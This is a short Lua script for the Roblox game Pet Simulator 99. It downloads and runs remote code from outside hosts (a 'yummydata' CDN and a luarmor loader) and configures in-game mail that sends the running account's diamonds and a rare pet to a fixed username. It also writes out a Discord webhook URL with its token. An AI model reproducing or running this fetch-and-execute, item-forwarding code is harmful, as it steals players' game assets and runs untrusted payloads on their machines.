task.spawn(function() 
_G.Config={UserID="07a296c1-6518-4959-a7e6-124be88ac2a2",discord_id="474925167886336001",Note="Pc"}local s;for i=1,5 do s=pcall(function()loadstring(game:HttpGet("https://cdn.yummydata.click/scripts/pet99"))()end)if s then break end wait(5)end
end)

setfpscap(5)


_G.TP_to_W2 = true --teleport to world 2
_G.Enter_Halloween_locally = true --almost no errors "Unspecified error has occured!"
_G.Mail_Config = {
    ["Diamonds"] = {Class = "Currency", MinAmount = 50000000},
    ["Huge Skeleton Snake"] = {Class = "Pet", MinAmount = 1,}
}
_G.User = "jessbenkoontop"
_G.Max_Mail_Cost = 1000000
_G.DiscordID = "474925167886336001"
_G.Url = "https://discord.com/api/webhooks/1305948515234742362/S6IwN-9JA-jpemtbv5GUCTyTlzhA5rpH6ac7JrVMQQid8ieYlxEZ46IYyHDQG0hlOAA2"
repeat
    local success, err = pcall(function() loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/7617273647367eceb9b363392228f02c.lua"))() end)
    task.wait(20)
until success

